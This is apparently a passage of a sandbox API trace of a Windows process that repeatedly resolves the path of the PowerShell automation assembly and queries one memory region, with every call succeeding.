	[0225.419] VirtualQuery (in: lpAddress=0x10d2d4, lpBuffer=0x10e2d4, dwLength=0x1c | out: lpBuffer=0x10e2d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.419] VirtualQuery (in: lpAddress=0x10d310, lpBuffer=0x10e310, dwLength=0x1c | out: lpBuffer=0x10e310*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.419] GetLastError () returned 0x0
	[0225.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.419] GetLastError () returned 0x0
	[0225.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.419] GetLastError () returned 0x0
	[0225.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.419] GetLastError () returned 0x0
	[0225.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.419] GetLastError () returned 0x0
	[0225.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.420] GetLastError () returned 0x0
	[0225.420] VirtualQuery (in: lpAddress=0x10d2d4, lpBuffer=0x10e2d4, dwLength=0x1c | out: lpBuffer=0x10e2d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.420] VirtualQuery (in: lpAddress=0x10d310, lpBuffer=0x10e310, dwLength=0x1c | out: lpBuffer=0x10e310*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.420] GetLastError () returned 0x0
	[0225.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.420] GetLastError () returned 0x0
	[0225.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.421] GetLastError () returned 0x0
	[0225.421] VirtualQuery (in: lpAddress=0x10d2d4, lpBuffer=0x10e2d4, dwLength=0x1c | out: lpBuffer=0x10e2d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.421] VirtualQuery (in: lpAddress=0x10d310, lpBuffer=0x10e310, dwLength=0x1c | out: lpBuffer=0x10e310*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.421] GetLastError () returned 0x0
	[0225.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.422] GetLastError () returned 0x0
	[0225.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.422] GetLastError () returned 0x0
	[0225.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.422] GetLastError () returned 0x0
	[0225.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.422] GetLastError () returned 0x0
	[0225.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.422] GetLastError () returned 0x0
	[0225.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.422] GetLastError () returned 0x0
	[0225.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.422] GetLastError () returned 0x0
	[0225.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.422] GetLastError () returned 0x0
	[0225.422] VirtualQuery (in: lpAddress=0x10d2d4, lpBuffer=0x10e2d4, dwLength=0x1c | out: lpBuffer=0x10e2d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.423] VirtualQuery (in: lpAddress=0x10d310, lpBuffer=0x10e310, dwLength=0x1c | out: lpBuffer=0x10e310*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.423] GetLastError () returned 0x0
	[0225.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.423] GetLastError () returned 0x0
	[0225.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.423] GetLastError () returned 0x0
	[0225.423] VirtualQuery (in: lpAddress=0x10d2d4, lpBuffer=0x10e2d4, dwLength=0x1c | out: lpBuffer=0x10e2d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.423] VirtualQuery (in: lpAddress=0x10d310, lpBuffer=0x10e310, dwLength=0x1c | out: lpBuffer=0x10e310*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.424] GetLastError () returned 0x0
	[0225.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.424] GetLastError () returned 0x0
	[0225.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.424] GetLastError () returned 0x0
	[0225.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.424] GetLastError () returned 0x0
	[0225.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.424] GetLastError () returned 0x0
	[0225.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.424] GetLastError () returned 0x0
	[0225.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.424] GetLastError () returned 0x0
	[0225.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.424] GetLastError () returned 0x0
	[0225.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.424] GetLastError () returned 0x0
	[0225.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.424] GetLastError () returned 0x0
	[0225.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.425] GetLastError () returned 0x0
	[0225.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.425] GetLastError () returned 0x0
	[0225.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.425] GetLastError () returned 0x0
	[0225.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.425] GetLastError () returned 0x0
	[0225.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.425] GetLastError () returned 0x0
	[0225.425] VirtualQuery (in: lpAddress=0x10d744, lpBuffer=0x10e744, dwLength=0x1c | out: lpBuffer=0x10e744*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.426] GetLastError () returned 0x0
	[0225.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.426] GetLastError () returned 0x0
	[0225.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.426] GetLastError () returned 0x0
	[0225.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.426] GetLastError () returned 0x0
	[0225.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.426] GetLastError () returned 0x0
	[0225.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.426] GetLastError () returned 0x0
	[0225.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.426] GetLastError () returned 0x0
	[0225.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.427] GetLastError () returned 0x0
	[0225.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.427] GetLastError () returned 0x0
	[0225.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.427] GetLastError () returned 0x0
	[0225.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.427] GetLastError () returned 0x0
	[0225.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.427] GetLastError () returned 0x0
	[0225.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.427] GetLastError () returned 0x0
	[0225.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.427] GetLastError () returned 0x0
	[0225.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.427] GetLastError () returned 0x0
	[0225.427] VirtualQuery (in: lpAddress=0x10d744, lpBuffer=0x10e744, dwLength=0x1c | out: lpBuffer=0x10e744*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.428] GetLastError () returned 0x0
	[0225.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.428] GetLastError () returned 0x0
	[0225.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.428] GetLastError () returned 0x0
